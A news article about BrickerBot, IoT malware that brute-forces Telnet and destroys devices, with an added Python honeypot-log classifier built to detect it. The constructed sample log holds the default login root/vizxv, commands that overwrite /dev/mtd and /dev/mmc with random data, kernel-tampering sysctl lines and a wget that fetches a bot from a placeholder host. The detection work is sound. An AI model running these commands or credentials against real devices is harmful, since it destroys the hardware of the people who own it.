BrickerBot targets insecure IoT devices - and then bricks them

'Grey hat' hacker suspected to be behind malware that seeks out and takes down insecure connected devices

BrickerBot, a new form of "permanent denial-of-service" (PDoS) malware, has been spotted in the wild in two separate attack waves aimed at the same class of insecure Internet of Things (IoT) devices that were targeted by Mirai.

But while Mirai sought to herd the devices into a massive distributed denial-of-service (DDoS) botnet, BrickerBot (as the name suggests) is designed to render them useless.

The malware has been detected on honeypot servers maintained by DDoS protection company Radware.

"Over a four-day period, Radware's honeypot recorded 1,895 PDoS attempts performed from several locations around the world. Its sole purpose was to compromise IoT devices and corrupt their storage," warned the company in a Threat Advisory.

The company says it picked up two distinct waves of what it has called BrickerBot, originating from different botnets. The source of the second wave, it says, was concealed behind Tor exit nodes.

"The Bricker Bot PDoS attack used Telnet brute force - the same exploit vector used by Mirai - to breach a victim's devices. Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but was able to record that the first attempted username/password pair was consistently 'root'/'vizxv'," warned the company.

IoT devices that ship with hard-coded or unchangeable default credentials - and there are some - could therefore be rendered useless by such an attack within seconds of being found, since the owner has no way to close the door the bot walks through.

"Upon successful access to the device, the PDoS bot performed a series of Linux commands that would ultimately lead to corrupted storage, followed by commands to disrupt Internet connectivity, device performance, and the wiping of all files on the device…

"Among the special devices targeted are /dev/mtd (Memory Technology Device - a special device type to match flash characteristics) and /dev/mmc (MultiMediaCard - a special device type that matches memory card standard, a solid-state storage medium).

"The sysctl commands attempt to reconfigure kernel parameters: net.ipv4.tcp_timestamps=0 disables TCP timestamps, which does not affect local LAN IPv4 connectivity, but seriously impacts the internet communication, and kernel.threads-max=1 limits the max number of kernel threads to one."
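The behaviour Radware describes above (a Telnet login whose first credential pair is root/vizxv, no binary download, writes aimed at /dev/mtd and /dev/mmc, and sysctl changes to net.ipv4.tcp_timestamps and kernel.threads-max) is a usable detection signature for anyone running a Telnet honeypot. The following is an added example, not code from the article or from Radware: it parses a constructed, hypothetical honeypot log format (timestamp, source IP, event type, details) and classifies each source as BrickerBot-like PDoS, a Mirai-style loader, or a mere brute-force probe. The log lines, the IP addresses and the command text are all constructed for the example; the alternative credential pair and the download URL are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample of a Telnet-honeypot log in an assumed, hypothetical
# format:  <ISO timestamp> <source IP> <event> <details>
# These lines are illustrative only; they are not Radware's honeypot data.
SAMPLE_LOG = """\
2017-04-05T10:12:01Z 203.0.113.7 login root/vizxv ok
2017-04-05T10:12:02Z 203.0.113.7 cmd busybox cat /dev/urandom >/dev/mtd0 &
2017-04-05T10:12:02Z 203.0.113.7 cmd busybox cat /dev/urandom >/dev/mmcblk0 &
2017-04-05T10:12:03Z 203.0.113.7 cmd sysctl -w net.ipv4.tcp_timestamps=0
2017-04-05T10:12:03Z 203.0.113.7 cmd sysctl -w kernel.threads-max=1
2017-04-05T10:15:44Z 198.51.100.9 login admin/admin fail
2017-04-05T10:15:45Z 198.51.100.9 login root/admin ok
2017-04-05T10:15:46Z 198.51.100.9 cmd wget http://example.invalid/bot -O /tmp/bot
2017-04-05T10:20:00Z 192.0.2.5 login root/vizxv fail
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (login|cmd) (.*)$")
# Flash block devices named in the advisory as the targets of the storage corruption.
FLASH_DEV_RE = re.compile(r"/dev/(mtd|mmc)")
# The two kernel parameters the advisory says the bot rewrites.
SYSCTL_RE = re.compile(r"\bsysctl\b.*\b(net\.ipv4\.tcp_timestamps=0|kernel\.threads-max=1)\b")
# Bricker does not fetch a payload; Mirai-style loaders do. Used to separate the two.
DOWNLOAD_RE = re.compile(r"\b(wget|tftp|curl|ftpget)\b")
FIRST_PAIR = "root/vizxv"   # first username/password pair Radware saw on every attempt


def parse_sessions(log_text):
    """Group events per source IP, preserving order. Returns {ip: [(event, details), ...]}."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate malformed lines instead of aborting the whole run
        _ts, ip, event, details = m.groups()
        sessions[ip].append((event, details))
    return sessions


def classify_session(events):
    """Return (verdict, indicators) for one source's ordered events."""
    logins = [d for e, d in events if e == "login"]
    cmds = [d for e, d in events if e == "cmd"]
    ind = {
        "first_pair_root_vizxv": bool(logins) and logins[0].split()[0] == FIRST_PAIR,
        "login_succeeded": any(l.endswith(" ok") for l in logins),
        "flash_device_write": any(FLASH_DEV_RE.search(c) for c in cmds),
        "sysctl_tamper": any(SYSCTL_RE.search(c) for c in cmds),
        "binary_download": any(DOWNLOAD_RE.search(c) for c in cmds),
    }
    if (ind["login_succeeded"]
            and (ind["flash_device_write"] or ind["sysctl_tamper"])
            and not ind["binary_download"]):
        verdict = "pdos_brickerbot_like"
    elif ind["login_succeeded"] and ind["binary_download"]:
        verdict = "botnet_loader_like"
    elif ind["first_pair_root_vizxv"]:
        verdict = "bruteforce_probe"
    else:
        verdict = "unclassified"
    return verdict, ind


def classify_log(log_text):
    """Map every source IP in the log to a verdict string."""
    return {ip: classify_session(ev)[0] for ip, ev in parse_sessions(log_text).items()}


if __name__ == "__main__":
    for ip, verdict in classify_log(SAMPLE_LOG).items():
        print(ip, verdict)
```

The absence of a download is doing real work here: a session that logs in and immediately writes to flash or throttles kernel.threads-max without first fetching a payload is what separates a PDoS bot from the loader stage of a DDoS botnet. On a real honeypot the session key should be the connection, not the source IP, since Tor exit nodes (as in the second wave) will fold many operators into one address.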

The researchers suggest that the version of BrickerBot they have picked up is targeted at Linux/BusyBox IoT devices that have their Telnet ports open and publicly exposed to the internet - the same as the devices targeted by Mirai.

The authors of BrickerBot, and the people behind the wave of attacks picked up by Radware, are currently unknown. It may be malicious in intent, but equally it could be intended to take known vulnerable devices offline so that they pose no threat in future.
